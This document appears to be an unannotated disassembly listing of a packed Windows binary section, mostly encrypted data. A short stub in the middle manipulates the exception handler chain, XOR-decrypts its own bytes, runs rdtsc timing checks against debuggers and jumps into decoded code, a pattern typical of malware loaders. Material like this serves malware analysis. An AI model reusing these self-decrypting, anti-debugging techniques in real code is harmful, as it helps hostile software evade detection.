14283Ch, 0E32959B1h dd 8974BEAFh, 10243B97h, 4BE61798h, 46BB0019h, 2BD2C5Ch dd 9DDA796Ah, 4411A7E6h, 0BB44586Fh, 3EF73442h, 0C09F39AAh dd 0F4D16739h, 704182Fh, 80B4DE9Fh, 0D56B788Ch, 142B9Bh dd 0B2989B1Ah, 63E90C93h, 53AF384Ch, 6074D5F4h, 0F48B380Ch dd 20344BD3h, 0F0C4D831h, 410A79Ch, 0D844586Fh, 1F0BF6A5h dd 93DD3AC3h, 0E5D7687Ch, 0F03227F0h, 0A8F643DCh, 7B743207h dd 33105BFDh, 0B3C1332Ch, 703E0154h, 2F84BDC5h, 8AD7E8CAh dd 708420A0h, 0C865485Dh, 2F1B1F9Ch, 0B8373D8Ch, 10F5585Ah dd 0D850BD2Ch, 0B0CEB8FAh, 380CA182h, 1772F038h, 72313723h dd 83A6EC83h, 0A58119DEh, 5BC4EED4h, 0C5F17F79h, 10240E74h dd 0B4D5E8FCh, 0D5016F8Eh, 23347E64h, 0A5E4F80Ch, 253129B0h dd 0CF446E54h, 0B0FF7E3h, 352939C6h, 40545E44h, 980C182Ch dd 0A0B4C8DAh, 506210D5h, 0E84C283Ch, 4F3B3FC4h, 58E90D16h dd 94A2387Ah, 0F6EC75D6h, 0ED0110ACh, 0C2347E64h, 75610FECh dd 88949E84h, 4544586Ch, 7F498815h, 91A48EF4h, 0C5A3AD08h dd 0F0322089h, 0A8B4C8DCh, 0EDE463F8h, 2210A1h, 3074ACE9h dd 564C1621h, 0B7503D4Ch, 0F84B557Ch, 481989Ah, 85B1BFC2h dd 0D0E4CE34h, 0F414A8BCh, 0ADF9D865h, 0E2F43E24h, 352731BBh dd 4062579Ch, 303F02Ch, 0C15C3723h, 0B89B8771h, 142A4Ch dd 8F584567h, 0FD7788AAh, 101207ECh, 3F289114h, 20009753h dd 0AB34485Eh, 0E6DB60B9h, 0BCCA23BCh, 4AAC866Fh, 0EF0BF7E1h dd 90A6824Eh, 641EE97Ch, 1004184Ch, 0F6E63657h, 5370028Fh dd 85E33846h, 0B0F2E049h, 7074889Ch, 0ADAD2C39h, 0C0E2D718h dd 48342D21h, 0ADBF486Ah, 0D0D2E86Bh, 39C30C4Fh, 30445240h dd 0F0F4BD91h, 3557B8FAh, 42B768CDh, 75F3BCDFh, 0A082F079h dd 4064788Ch, 0BAAC33h, 0C33BD8ECh, 8EC260B4h, 85AFC7B3h dd 0C0E2D728h, 0F48B4A29h, 203448C4h, 0EF7C4D87h, 0CA1FA88Ah dd 140ED97Ch, 0F4087Ch, 0E3ACF2E7h, 439D5B7Eh, 7D3F0C5Eh dd 0A082D8BBh, 4003F507h, 5666280Ah, 33E0E467h, 5664EF39h dd 0B7A7384Ch, 0C0D4E89Bh, 78FE13ACh, 233C025Dh, 5B137FFBh dd 0B6AB0439h, 95C1AF6Ch, 0A0F43E24h, 0E4A4B8CCh, 434C9F7Eh dd 0C02D145Eh, 9F547D55h, 23EF78BAh, 0F7242914h, 86FC7D69h dd 6074C89Ch, 0E7264C4Ch, 893CB9E4h, 297B6750h, 533744B7h dd 0DC96D324h, 2467FEEDh, 85C90133h, 0E0C230ACh, 0AF400545h dd 0E4A7684Ah, 0C10B4673h, 7333454Eh, 6A64788Ch, 362C8BA9h dd 0D9C2ADECh, 5422F04Eh, 0E074B05Eh, 3F0E4814h, 3A0FC253h dd 307E4B50h, 0E8417DFBh, 8094A88Ah, 71C9486Ch, 69E77D19h dd 0A69B5841h, 27D16B7Ch, 73042E3Ch, 0A0B4AF7Bh, 134F788Ch dd 5293A114h, 47C4D8ECh, 5648E819h, 1024394Ch, 7D39CFCh dd 0D02490EFh, 0A5C3E8FCh, 0D0D2C0A9h, 94A8BCh, 0D8165F18h dd 1F0BFF66h, 70293396h, 0A3545E43h, 0D84F9129h, 2D3FC537h dd 50524750h, 3FF2ADFh, 47EC9367h, 564C2D19h, 10243B4Ch dd 4BC09CFCh, 46BB7C29h, 0F0B94B5Ch, 0D3E4CE33h, 0B6AB6439h dd 0BB4C596Ch, 657F1856h, 90928750h, 335C2245h, 0F84E912Fh dd 23A48ADDh, 0DB6420EFh, 362B8CB9h, 9874B0ECh, 2275889Ch dd 53256144h, 634162ACh, 8784AE94h, 160CEDD9h, 0D0E4F80Ch dd 8392DCACh, 6543FE1h, 17F4BE1Ch, 0A69C1D49h, 4254687Ch dd 0E106D2Ch, 5313F1Ah, 50644EB4h, 75142C3Ch, 147152EAh dd 9774BEA4h, 261C9DC9h, 0C094E8FCh, 0FA8FEDACh, 8AF64A5Bh dd 27062E0Eh, 871EA157h, 32EE9A5Eh, 0D303EACAh, 0B22FDC1Eh dd 1856E718h, 0CF78A5AFh, 0AFB4C8EAh, 0AF9EA608h, 98A1D7C3h dd 4FC4EED3h, 564F5A09h, 8491C74Ch, 3FD4DEC3h, 46BFDE39h dd 0A0B9C55Ch, 5DE4CE33h, 0B6AB2029h, 5A16096Ch, 9C41F71Ch dd 6FA48EF3h, 766FAEE9h, 8CB1E72Ch, 5FB4FEE3h, 665F3E19h dd 68A1A53Ch, 4FC4EED2h, 564BF029h, 85DB6E4Ch, 0C0E2D33Eh dd 4FF83D2Fh, 0E334486Ah, 0D0E4F8E4h, 81FEF5BCh, 7F4B5EDh dd 10AC082Ah, 0E42179C3h, 0C5545E69h, 3887DBECh, 61BB3823h dd 66710C09h, 1029EB3Ch, 0C5C4F2ECh, 1CF5EE80h, 61483468h dd 28B4FB89h, 8F7B6768h, 0F4DC4D29h, 381B07F6h, 7F6B576Eh dd 1DBB760Dh, 0F2C05E64h, 90A49D74h, 0E5BC087Ch, 85FBE7D3h dd 84F043E5h, 38D1F5BCh, 8B141E02h, 31A2D0BCh, 13768EA6h dd 104C6E69h, 4BD417FCh, 2284F268h, 32A1B70Ch, 53E4CE30h dd 0BE15A078h, 6C7B6730h, 26770B69h, 6A2550C8h, 3FBC9783h dd 91FBE7D3h, 0A0C0701Fh, 0E18F788Ch, 140784h, 0B0D930ECh dd 40B6889Ch, 1014804Ch, 0D03CE8FCh, 0B28498ACh, 0A58C4878h dd 38E4F80Dh, 8094A8BFh, 0BD4474AEh, 2DF82C48h, 905C3BE2h dd 0A8347100h, 0F004182Ch, 90909C57h, 0D17EF3D1h, 362CAFD1h dd 517E30ECh, 0A2157763h, 11263848h, 0C7D7EEF9h, 72DE4F3Dh dd 15FF6275h, 1001194h, 90h, 1CDh dup(0) dd 816FD700h, 7Ch, 13DCh dup(0) ; --------------------------------------------------------------------------- pusha call loc_31442010 call sub_31442094 jmp near ptr byte_31442040 ; --------------------------------------------------------------------------- loc_31442010: ; CODE XREF: UPX2:31442001p push dword ptr fs:0 xor ds:dword_31442041, esp mov fs:0, esp xor edx, edx push 20h push edx push 80000000h push 80000000h push edx push edx push edx push edx push edx push edx call ds:dword_3143808C ; LoadLibraryA ; --------------------------------------------------------------------------- byte_31442040 db 0BCh ; CODE XREF: UPX2:3144200Bj dword_31442041 dd 12FF48h ; --------------------------------------------------------------------------- sub eax, eax loc_31442047: ; CODE XREF: UPX2:3144204Dj dec al or al, al jz short loc_31442051 jnz short loc_31442047 jmp short loc_314420B8 ; --------------------------------------------------------------------------- loc_31442051: ; CODE XREF: UPX2:3144204Bj call $+5 pop ecx sub ecx, 0FFFFFFB5h xor ebx, ebx xor ebx, 28B0h cld mov ebp, 0D9h push ecx loc_3144206C: ; CODE XREF: UPX2:3144207Fj xchg al, [ecx] cld cld xor ax, bp cld xchg al, [ecx] cld cld add ecx, 1 inc ebp dec ebx or ebx, ebx jnz short loc_3144206C pop ecx pop large dword ptr fs:0 pop ebp mov [esp+18h], ecx popa jmp ecx ; --------------------------------------------------------------------------- align 4 ; =============== S U B R O U T I N E ======================================= sub_31442094 proc near ; CODE XREF: UPX2:31442006p arg_C = dword ptr 10h mov ecx, [esp+arg_C] xor eax, eax pop dword ptr [ecx+0B8h] retn sub_31442094 endp ; sp-analysis failed ; --------------------------------------------------------------------------- db 0E8h, 2 dup(0) dd 48B0000h, 9889FC24h, 2FE3h, 28A080F7h, 0 ; --------------------------------------------------------------------------- loc_314420B8: ; CODE XREF: UPX2:3144204Fj add [eax+4245C8Bh], al jz short loc_314420EC pop ecx mov [eax+2FE7h], esi mov [eax+2FEBh], edi cmp byte ptr [eax+28A4h], 0E8h jnz short loc_314420E3 add ebx, [eax+28A5h] mov ebx, [ebx+2] push dword ptr [ebx] jmp short loc_314420EB ; --------------------------------------------------------------------------- loc_314420E3: ; CODE XREF: UPX2:314420D4j mov ebx, [eax+28A6h] push dword ptr [ebx] loc_314420EB: ; CODE XREF: UPX2:314420E1j pop ebx loc_314420EC: ; CODE XREF: UPX2:314420BEj push ebp mov ebp, eax sub dword ptr [esp+4], 5 sub ebp, 361005h mov edi, [esp+4] lea esi, [ebp+3638B0h] mov ecx, 0 rep movsb call sub_31442161 mov ecx, eax call sub_31442161 sub eax, ecx jz short loc_31442135 cmp eax, 100h ja short loc_31442135 lea eax, [ebp+3610D3h] mov dl, [eax-10h] call sub_31442165 jmp short loc_31442174 ; --------------------------------------------------------------------------- loc_31442135: ; CODE XREF: UPX2:3144211Cj ; UPX2:31442123j test dword ptr [ebp+3638A5h], 80000000h jz short loc_3144215F lea esi, [ebp+3638A9h] mov edi, [esp+4] movsb movsd mov esi, [ebp+363FECh] mov edi, [ebp+363FF0h] mov ebx, [ebp+363FE8h] loc_3144215F: ; CODE XREF: UPX2:3144213Fj pop ebp retn ; =============== S U B R O U T I N E ======================================= sub_31442161 proc near ; CODE XREF: UPX2:3144210Ep ; UPX2:31442115p rdtsc retn sub_31442161 endp ; --------------------------------------------------------------------------- db 84h ; =============== S U B R O U T I N E ======================================= sub_31442165 proc near ; CODE XREF: UPX2:3144212Ep mov dh, dl mov ecx, 27D2h loc_3144216C: ; CODE XREF: sub_31442165+Cj xor [eax], dl inc eax add dl, dh loop loc_3144216C retn sub_31442165 endp ; --------------------------------------------------------------------------- loc_31442174: ; CODE XREF: UPX2:31442133j add eax, 6BE08CEBh out 1Dh, eax pop ebx jmp far ptr 0B44Ch:0C759C47Ch ; --------------------------------------------------------------------------- db 0C1h dd 50CD482Fh, 0EB332DD4h, 4CAF6B27h, 0D0C4F992h, 1BE0FD41h dd 731FE044h, 3B0CDAAFh, 333FA07Eh, 134F6515h, 0E2245932h dd 0F919B810h, 6F7980F5h, 64E849E7h, 7976FA91h, 3C85EBF9h dd 64CEB390h, 5F3F4B9Dh, 0EB925C63h, 8BEF749Eh, 837B4C7Fh dd 900060F7h, 0CC5F9814h, 0F849DB4Bh, 0AC58D655h, 2F1FC821h dd 0A6D95182h, 186CDE5Fh, 7CF879h, 71E97AC7h, 56D97DE0h dd 71D846C1h, 96436BB4h, 6B86CD4Dh, 6D3458E2h, 37EC68E4h dd 0E1B00C91h, 0E249FC77h, 0A06EF766h, 39FA5777h, 0F607F6B1h dd 0D38F2044h, 20D9D854h, 0F6F6C6Bh, 0FF2C078Bh, 26B74611h dd 2F5C9D94h, 30AFA921h, 6C01B8B4h, 51CC7ED1h, 0D5234CA1h dd 70DA570Ch, 95D0F50Ah, 15838832h, 0A02A8D90h, 15AFAFCFh dd 0C00AADB0h, 0A4E94B44h, 0E05CEE41h, 0E5144DE7h, 837CF842h dd 26997421h, 0E6CB1894h, 6BEF921h, 0F53539B4h, 50FA7396h dd 752CED59h, 0B9DF68D2h, 0BBA2C579h, 0B0BD8832h, 0A01F14FCh dd 25D3F724h, 0C00A83AAh, 0DF532085h, 0E05C0CD0h, 0E42B6364h dd 0C37FB81Eh, 109C08ECh, 7619919Ch, 58AC1E9Fh, 40BC48BDh dd 0C53348AEh, 60EA6302h, 0F4E3A861h, 80FC7A1Ah, 90B90593h dd 2B1CAE04h, 0BC2F11CBh, 2DBDB834h, 0D07AD844h, 0F20D4DD9h dd 559FE852h, 0ECFF1A8Bh, 7A7083A4h, 795C2B9Ch, 2B95BD29h dd 0EB4F3882h, 745B44Fh, 7C9BA6C4h, 70EF00B3h, 150378F5h dd 903AB352h, 253C5C97h, 2FA8A7E4h, 573CB836h, 0D126C82Eh dd 0E058D83Ch, 0F06C80E4h, 9583F875h, 10BA33D2h, 0A493D811h dd 30AC2A26h, 28EC38DEh, 50C848C4h, 881D58BEh, 71863FE8h dd 80FD10A4h, 5F38805h, 0A02AA342h, 0B12CA24Ch, 96A94734h dd 384CFE7Fh, 0E05CD851h, 0F06EB98Dh, 597C9274h, 1AE60267h dd 1B568D6Bh, 0C1472892h, 3601BB77h, 50CC7EFFh, 62E8DCDBh dd 760468E4h, 0CEFC78F4h, 0DC40CC50h, 32896714h, 3D2C9E1Fh dd 0F62B7281h, 5D85FB44h, 0D66706E9h, 63625964h, 7E8C9Ch dd 2318B84h, 209C2EA8h, 32ACACABh, 0C53738B4h, 50FA7326h dd 0EFDD282Bh, 46DB9461h, 7A79F3F4h, 6F0CBE3Fh, 25939964h dd 0B01A906Dh, 0FBDA3DBFh, 0A0B3C872h, 0B0D95755h, 7B6CDE5Ch dd 364712F9h, 0EF96EB84h, 0A51319E5h, 309A10F9h, 7B4EB53Fh dd 592F48F2h, 0EFDD292Bh, 46D40261h, 814490F4h, 2D818804h dd 0A02AA47Ch, 0B04667AFh, 0B0C361C2h, 0D3AD4B40h, 195F983Eh dd 9A6C8233h, 0D7C9756Ch, 0A98C3E91h, 209C188Dh, 0CEE12C29h dd 2643C74Bh, 1DC8C56Fh, 60DC58D4h, 3761C382h, 64CED3F0h dd 0AB181D89h, 0C6B09822h, 1B4AAAADh, 223E7AB7h, 0BA9843B1h dd 9055B054h, 3CE7E864h, 0C4F7F81Eh, 10E408EEh, 4A941894h dd 5AFE79E4h, 0D54368BAh, 50FA732Ah, 2018DB8Ch, 709C618Ch dd 0EA28F3F4h, 0FAC00304h, 0CA1CF254h, 0B046FA26h, 0C04CB15Ch dd 814CA244h, 1F0C273Eh, 0C6571EF1h, 8525A774h, 1708077Bh dd 0AD9C1895h, 6BC2811h, 4CBF81B4h, 0BF4748C4h, 8D5DFD27h dd 70DA78E4h, 94CBFD79h, 70F38832h, 8076CC44h, 25D3574Eh dd 0C00A83CAh, 0A51308C1h, 0E1123060h, 0E184E864h, 537CF874h dd 72E94CE1h, 52CC7FE1h, 5CC55ECDh, 40D95FD1h, 5583A093h dd 0D52358D4h, 70DA5788h, 0BB7EED0Bh, 6F5B8832h, 9627DE81h dd 0DA2CC224h, 0B6A94736h, 694CFE7Fh, 0E05CD97Ch, 798DC3F3h dd 5728DC78h, 2B369D7Bh, 0D6AF18A2h, 0CFA8D27h, 14BC3882h dd 0EE59B793h, 0E5DC6EEFh, 368A1C24h, 0F2F88677h, 0B47877EAh dd 0CA1CF21Ch, 6B9570Eh, 453C8E0Fh, 4390BC84h, 0E0595FBCh dd 61A5DB64h, 8545C297h, 10BA34D2h, 5C1D2AE1h, 43CF0C80h dd 68C84BC6h, 5E518945h, 348C58D4h, 20BD3EB4h, 15032BA4h dd 903AB36Ah, 0D4455891h, 9458572Bh, 96B9373Ch, 384CFE78h dd 1FA32591h, 0B6F91737h, 0EB7CCE4Fh, 3848890Ah, 779C1895h dd 0BEABD5Bh, 0D5433882h, 50FA7382h, 9F27303Dh, 1AB6681Bh dd 0EAFC12F4h, 0F80CE204h, 0A0189815h, 0B0466CAFh, 4B30D264h dd 86AE3780h, 0E068872Ch, 18A5DB64h, 0FF8307AEh, 5CA9D09h dd 71CE18A2h, 0A55378F5h, 408A03FEh, 93EC8C47h, 38840044h dd 70DC61E4h, 80F210F4h, 900C8904h, 0A01C9814h, 0B02CA824h dd 0C0141D34h, 0D04CC844h, 0B30A8954h, 0CB3E7D9Bh, 59D7F842h dd 654C8C28h, 0E372FA6Fh, 29DDBD29h, 0BFEE3882h, 66F7E251h dd 0C59D1D4h, 98EC5EDBh, 80FC78E2h, 0FB63E748h, 0D24CE861h dd 0DC45DE4Dh, 9659DF51h, 0B539A425h, 1F0CD815h, 0C657BAF1h dd 70F97174h, 0D38C3EBBh, 53FD5AC8h, 5DCD66C1h, 22F35CD1h dd 24AF2DAEh, 148A04A7h, 48F0DB7h, 0F48F14F4h, 0FE69E476h dd 0C56EDB14h, 0F649DC45h, 8159D45Dh, 0B53E8B44h, 0A639AC35h dd 0BD09840Dh, 690C8815h, 10CD6FEAh, 41F96AD7h, 42FC4DD0h dd 33D95BDBh, 13CC09B7h, 14BD3DA6h, 1D893A81h, 0D4990C9Bh dd 0F169FA6Ch, 0D25F9870h, 0D558C941h, 0A54ED060h, 934CAC25h dd 943DBD26h, 9F03BC01h, 6C199018h, 43BE3BF4h, 53EC79FAh dd 30D847CCh, 34D540F1h, 35BE2090h, 26DC3CB5h, 2489048Dh dd 0D499159Dh, 0E375DB6Bh, 0F471FD60h, 0B049C54Dh, 0A559CA72h dd 0A22EA108h, 0E025AA35h, 0B6188D23h, 4119941Dh, 79FE7CF0h dd 45E86DF6h, 77AC69D7h, 29FA4CD1h, 399F2DA8h, 27DC3DAEh dd 19AA1C81h, 0E9A81D98h, 0D70CED69h, 0CF51EC71h, 0D540DD40h dd 0A452D97Ch, 0D00DAD28h, 0B428BD13h, 0B61C8501h, 4E19941Dh dd 51E965E5h, 54F95F94h, 40C14DF0h, 28C859E4h, 358B4885h dd 12B90EA0h, 1E830197h, 0F4993FF4h, 0E37EED52h, 0E572F77Dh dd 0F72CE95Ch, 0AF6ACC51h, 0B521BD28h, 8F3AB61Dh, 840D8516h dd 4112971Dh, 71E34484h, 42F554F0h, 49DE49D6h, 21F138F5h dd 35A51EB4h, 26BA17A3h, 7089048Dh, 0EE9908BBh, 0F560E142h dd 0D06CF959h, 0F14BC64Dh, 0A54CF734h, 0BF3E982Ah, 932FBD37h dd 9F1EB864h, 730F9D17h, 79CA3AB7h, 20E86BE6h, 53C35AF4h dd 73CF4BD1h, 28A906F6h, 58F58A0h, 1C852E90h, 0F4883991h dd 0E56EE176h, 0E16FFD60h, 0C449FB24h, 0A550D172h, 0B521A110h dd 85308B54h, 0A36C9801h, 65088B0Dh, 7DE55CE9h, 66F34CF1h dd 64C944CDh, 40D955DDh, 31A12691h, 5B50EA4h, 368A2793h dd 8099149Dh, 0E47EE152h, 0E170F961h, 0D343C448h, 0A94EEF34h dd 0B90AAD30h, 0AE5CBD38h, 9A08A910h, 50088B01h, 79FA61F6h dd 45FB7DF8h, 5BC37CD7h, 0EBC56D1h, 35BE0BB0h, 26B92CB5h dd 7089048Dh, 0F2BF0CBAh, 0F578E961h, 0C373EA44h, 0B05FDB41h dd 0B27FCC7Ah, 0B538A921h, 8333AA04h, 0B51F9B01h, 7432F80Ch dd 71E97AC7h, 45CF7DE0h, 5FC55CC7h, 34F238DAh, 31A93A87h dd 13893DA0h, 2BC1A81h, 0F3991B9Bh, 0E4428877h, 0F66CF959h dd 0FF5BCD4Dh, 0A359EB52h, 0BE23A130h, 0AF289654h, 0B6028D14h dd 19941Dh, 60C37CCAh, 52CC76F1h, 43C94BCBh, 2BD36CC7h dd 1ECC26A1h, 5AC17A0h, 13893B8Ah, 0EE931180h, 0C078C604h dd 0C568F766h, 0D97ADC47h, 0A149CC46h, 0BD298528h, 0E025AA3Bh dd 853D9C2Ah, 49058A11h, 62E36EEAh, 49E879F9h, 5FF846CBh dd 40D25DDFh, 229B3C8Ah, 36B92CBDh, 5981A8Dh, 0E5B11495h dd 0E97EE769h, 0CC68CA14h, 0D345C671h, 9359DC5Bh, 0BE25BA30h dd 0A1338C33h, 0A3059B0Ah, 6E158A00h, 43DB08E3h, 41E84BD5h dd 40D95CD6h, 2FD05BB4h dd 3FBF2DB7h, 14B933B7h, 1E830BE4h, 0F49F1D9Ah, 0E469EF04h dd 0D46FF77Ch, 0D142D146h, 0B23CDD59h, 0D03AAB21h, 8432BD27h dd 93039B64h, 89D1Fh, 75F866CDh, 54F976E6h, 43C344E7h dd 2EDD70D1h, 50A924A0h, 5A8369Dh, 4890696h, 0C3881DB3h dd 0F562E66Bh, 0C479EC77h, 0C44DDC77h, 0AE75B851h, 0BE3EAD30h dd 9013AC31h, 0F02D8601h, 6508963Dh, 64E966F6h, 4EF968DBh dd 71C05AF1h, 34D271B4h, 35A23AA1h, 1B90AA0h, 1C852E80h dd 0C4BD7891h, 0D95CC952h, 0E432AA27h, 0E22CE468h, 0AC7FDF51h dd 9B29BB2Bh, 0B25CA131h, 80238F01h, 65379611h, 51F44DFDh dd 47F94A94h, 42C95DF5h, 2CDD6ECDh, 28892DB1h, 58E5895h dd 4893B83h, 0F59019A2h, 0D174CD61h, 562FCE14h, 0E67AAA4Eh dd 0C1566CBFh, 0C83E3716h, 90C92702h, 7B6CDE5Bh, 562AAEB0h dd 60735ED4h, 0FE09E78Ch, 0B3AC1E9Fh, 82E22870h, 194148CCh dd 3114732Fh, 70EC688Ch, 0A4B0F51Ch, 0FA0CE207h, 0F34CC911h dd 7CA7AD4Eh, 90E83364h, 810CA210h, 75A38B06h, 0F05AD462h dd 0FF703CF7h, 26B00611h, 28589B94h, 2439A567h, 73BC0E8Fh dd 2CC220Dh, 52DC68BCh, 2128E3E4h, 0D0BC12A5h, 1314E255h dd 0CA4890D4h, 25D3F82Ah, 0C00A8436h, 0E36C0CC7h, 0EF9C5D86h dd 2A9B2AFDh, 0C3BEDB2Ch, 0F8733BD3h, 0DF63E755h, 3009ACABh dd 28EC38B4h, 50CC38CDh, 60B68C5Fh, 3086A46Fh, 90FC789Ch dd 0C20EE204h, 0A974987Eh, 0DA2CA854h, 906FE934h, 0EBBA5DBBh dd 0B903D862h, 0CB2A7D9Bh, 0FFF9F842h, 9D0779F0h, 20AA0DE8h dd 0A5212447h, 408A28B4h, 39B99C7h, 0E5578A2Bh, 70DA5306h dd 0A707F779h, 0BBE48804h, 2BE367EBh, 861752A1h, 88B33534h dd 384CC86Ch, 1FA3274Eh, 0CB8A6DEFh, 8FF1F842h, 108C20CBh dd 0DF63117Ch, 0DA29A35Bh, 0C5BC0E8Fh, 0DDEC3C04h, 60F4045Bh dd 8E1880E4h, 577870Bh, 903AB3F6h, 0AB685891h, 984527A9h dd 1FD4B834h, 5BB337BAh, 0B59F8793h, 0F06CE88Ch, 0EDFDA574h dd 10BA1394h, 0A511D1A7h, 309A3639h, 11ED6CE5h, 0AF9D1994h dd 56E72A41h, 54E8EFE4h, 0BBBAED0Bh, 52518832h, 48499810h dd 0B02CA824h, 0FFD13969h, 0BA4CFE5Fh, 0EAC955ABh, 0A06CDE7Fh dd 245C3526h, 938C2284h, 0E7FA1450h, 6B77821h, 879CF5B4h dd 66D71A41h, 4ADC7CD4h, 1A2F35E4h, 891420EEh, 1D0C8804h dd 5EB6F956h, 73DCDDEDh, 0FC5C2D5Dh, 5449C872h, 691ED05Ch dd 0C65088F1h, 0C39E0F74h, 108CE0D1h, 0A1C11894h, 6B7B149h dd 2421B3B4h, 0D3CC7EF8h, 60D47CA8h, 7055ECEBh, 6C7D78F4h dd 900C8A0Ch, 0A118F040h, 25D3A824h, 0C00A83AEh, 54C134CFh dd 0E05DDC70h, 0F006B864h, 7CFC9Ch, 42DE5E84h, 0B5634F94h dd 309A1332h, 0D731F187h, 50CC49C0h, 62B60985h, 18ED02B5h dd 0C0FC78F4h, 0F2997756h, 361CAE2Fh, 0EB585EA1h, 0C454EC64h dd 874CC845h, 0C0786CABh, 0F6CE866h, 3640BAE1h, 0D0095184h dd 347F0EE0h, 5A78A3F4h, 17ED6AB4h, 8A59B792h, 39DC6EEFh dd 0A099A861h, 0C66987A2h, 1D0CBE3Fh, 0F74EDC43h, 3D74EC4Eh dd 0C03DBCA3h, 107F6344h, 1305C83Eh, 0A03CB8CFh, 502CA824h dd 7A19F7D6h, 0A19C2EAFh, 30AE2060h, 64C8C7B4h, 6259B7CCh dd 33DC6EE8h, 4CDEFD1Bh, 42A178C2h, 0AE8C8800h, 0E61DED1Eh dd 0A55425AFh, 0D9DFB802h, 0C04C5DC9h, 315FD862h, 74BE1732h dd 1FF4F7B4h, 1F8C0885h, 209D0810h, 0A92A8A4h, 0C0FA28C1h dd 0D4C348FAh, 60DC59D5h, 5CC5664h, 0BE7D3E05h, 0D742C154h dd 6F97DA61h, 0FF2DEEE2h, 0AA6D761Fh, 831A9944h, 0DC764DABh dd 0CB35E852h, 0DFF9F7B5h, 9D8C0884h, 16828911h, 58AC42A4h dd 40BC38B8h, 0C5331B94h, 60EA64FEh, 70EC64D9h, 3F7977F4h dd 790C8804h, 0A01C98A5h, 0E27C96A5h, 4533EE7Dh, 0D04CC8E1h dd 4C541ED7h, 7463E558h, 7CF8EDh, 0E3F928B8h, 2FA62438h dd 30ACA421h, 60B195B4h, 6DEC68E4h, 14B93FF5h, 4C401791h dd 1800DD4h, 0F82C777Ah, 0D169EC60h, 0C02FD6A5h, 0B513970Eh dd 2F0B0E2Ch, 5A6DD754h, 0F06CCF74h, 0FF2E1A83h, 26B7C211h dd 705C2B94h, 0D8FC78F4h, 40BC38BDh, 3EBB2780h, 4BD37B8h dd 4A7997E4h, 5FC4EC8h, 0A33AFCC4h, 0C49911DDh, 0E12C9E18h dd 0C03EB85Ch, 861D99C4h, 0DEC92704h, 7D6CDE58h, 36676BE1h dd 0D9BF5884h, 72CC49C0h, 0A55379F5h, 408A03C6h, 0AFE84C43h dd 56E71E41h, 0F02F90E4h, 0B6E91379h, 53F58904h, 0A176997Eh dd 0C3D39BDBh, 40294730h, 0E60CC0F9h, 0BE28D954h, 0AA1828E1h dd 0D0F72347h, 408F0337h, 972995A8h, 0BBAC1EB9h, 40BD340Eh dd 5846C3C4h, 63DC58D5h, 1027431Ch, 260FB37Fh, 0D709FC65h dd 8EF76DF6h, 0E3236FA7h, 4B6B74BFh, 0BA189890h, 8A0E8914h dd 0F6F9179Bh, 8B7CCE48h, 26B77209h, 2C589B94h, 0D92FE78Fh dd 2ABBFFB3h, 0D9CCA0C4h, 331F5B9Bh, 27B82EABh, 0DCB92AB5h dd 0E26FE149h, 0C673EB7Bh, 0D97BF450h, 0B753DC5Ah, 0A50F9437h dd 8E39AA26h, 8209BE10h, 6E139107h, 60F44DD8h, 45EE77F8h dd 51F828D6h, 34D95FC6h, 24BF278Ch, 60DC5AD4h, 0FF9E3DB4h dd 0E38E1124h, 0F976A660h, 0D032FE71h, 0F962A848h, 0A31CF377h dd 0A423B027h, 0EA3DBC22h, 0A229BB31h, 4F368F54h, 36AC46CDh dd 54EE71E2h, 0D8F922D1h, 40BC38B4h, 0F321C999h, 0A6DC6ECAh dd 46F90361h, 150378F4h, 903AB39Ah, 0D40370D5h, 3B32C218h dd 0F607EE81h, 0ECE09144h, 8676AD7Ah, 0ED93D6E5h, 0BDF1DB01h dd 10BA34DEh, 779E6E1Fh, 0BD094E01h, 768BE931h, 0A749C7C4h dd 9ADC6EE3h, 0FC162E6Dh, 310786BAh, 7BC36A05h, 5B037075h dd 0CCAF57DBh, 0B538B010h, 0D8C90E11h, 0E05CEE14h, 0F06CE08Ch dd 433AAB74h, 5CC04CAAh, 8A09E794h, 3BAC1E9Fh, 0D3AB4C74h dd 0AF9F4AAEh, 56E70A41h, 42CEDE4h, 887986FCh, 6F0CBE44h dd 24F40BC4h, 58D357DAh, 0C03CB83Fh, 8F0F8E17h, 0A4728B1Bh dd 0F6CA428h, 364752E1h, 0EEE5E084h, 0CE74E76Bh, 0CF53D751h dd 76AEE939h, 0DD057BC4h, 569C5C51h, 21BD39E4h, 0D1AD28A5h dd 36997755h, 481CAE2Fh, 0B02CA82Fh, 9279EB61h, 9462FA77h dd 1F5C9418h, 0C65742F1h, 761074h, 63FB0884h, 4EF56AE4h dd 30ED4ED0h, 1229C7E4h, 0D9CC7EFFh, 56E70251h, 0FDDD67E4h dd 0B6E50979h, 0F0890104h, 0F11CAE28h, 8B863DDBh, 0A8AFB802h dd 0D04CC840h, 0F9226DD9h, 7D35E852h, 3640BEC9h, 0E523E084h dd 0E7FAE76Bh, 6B24221h, 0C3EC38B4h, 66D22461h, 0F55158D4h dd 70DA76CEh, 81962CA4h, 0F85E886Eh, 201C9816h, 8C663DDBh dd 0B9B802h, 5D6EBD1Eh, 0D64285D9h, 0F606BA64h, 1E164DF9h dd 46D808B2h, 72CD48C4h, 0CE2BD5Bh, 0BFE43882h, 66F00E51h dd 7599ED4h, 70EC5EDAh, 80FC741Ch, 0DF5FDF04h, 922FD357h dd 0FC60EC0Ah, 6AA94734h, 434CFE7Fh, 0E05CDF3Ch, 25D96564h dd 597CCE6Ch, 2C9AB509h, 0A7418A2h, 0D853D751h, 40BC38B8h dd 19820193h, 4E881D9Ah, 70A024A0h, 0BB56ED0Bh, 50898832h dd 0A2291C1Bh, 0D8BFA824h, 0C03CB831h, 0C95F7DC9h, 6D05D862h dd 0C650DAD9h, 0F48F1074h, 0AD0FF77Bh, 20AA24A2h, 202827A4h dd 0C1BC38B6h, 50CDD828h, 61B40CD4h, 8FEC68E5h, 0B6C06E61h dd 0C80904h, 0F01C9815h, 0B0467CAFh, 0F6A94766h, 554CFE78h dd 0ED298194h, 0F07F600Ch, 0CAE90774h, 0FB8C3EBFh, 4C219B76h dd 30AC1EBAh, 0C53111C1h dd 50FA56B4h, 4249A784h, 0F5EC5ED8h, 9787734h, 1B0C8805h dd 0A0979454h, 35A398DBh, 0C00AA658h, 0EE2B4D82h, 8A5DD862h dd 9A6D8264h, 2EE90776h, 938C3EB8h, 0A493E76Ch, 30AC29C4h dd 2829B527h, 3ACC7EDAh, 9F8F0AC4h, 46D07671h, 8F3CFDF4h dd 900DC881h, 22A11514h, 12C9E3Ah, 3A15503Ch, 442437BBh dd 0BE5CD854h, 0C4E50E4Fh, 9583AC50h, 10BA3326h, 3E0CA519h dd 311D2892h, 0BF46325Ch, 2D59C53Bh, 0ADC6ECAh, 70F800E4h dd 